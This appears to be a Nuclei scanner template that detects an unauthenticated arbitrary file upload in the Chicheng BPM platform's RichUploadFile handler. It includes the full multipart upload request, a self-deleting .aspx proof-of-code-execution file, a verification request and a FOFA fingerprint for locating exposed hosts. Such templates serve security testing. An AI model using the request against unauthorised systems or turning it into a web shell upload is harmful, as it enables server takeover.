http:
    - raw:
        - |
          POST /WF/Comm/Handler.ashx?DoType=HttpHandler&DoMethod=RichUploadFile&HttpHandlerName=BP.WF.HttpHandler.WF_Comm_Sys&Directory=Mazi HTTP/1.1
          Host: {{Hostname}}
          Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj

          ------WebKitFormBoundaryFfJZ4PlAZBixjELj
          Content-Disposition: form-data; name="edit"; filename="{{username}}.aspx"
          Content-Type: image/jpeg

          <%@Page Language="C#"%><%Response.Write("pboyjnnrfipmplsukdeczudsefxmywe");System.IO.File.Delete(Request.PhysicalPath);%>
          ------WebKitFormBoundaryFfJZ4PlAZBixjELj--
    - matchers:
        - part: body
          type: word
          words:
            - pboyjnnrfipmplsukdeczudsefxmywe
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /DataUser/RichTextFile/Mazi/{{username}}.aspx HTTP/1.1
          Host: {{Hostname}}
id: chichengBPM-RichUploadFile-File-upload
info:
    author: Superhero
    description: |-
        fofa: body="/WF/AppClassic/Home.htm" || body="ccbpm" || body="/DataUser/Icon/LogBig.png"
        驰骋BPM低代码开发平台 RichUploadFile接口存在任意文件上传漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
    name: 驰骋BPM低代码开发平台 RichUploadFile 任意文件上传漏洞
    reference:
        - https://mp.weixin.qq.com/s/gCVLDBcv3A6cHnm62pdyTg
    severity: high
    tags:
        - 驰骋BPM
variables:
    username: '{{to_lower(rand_base(6))}}'
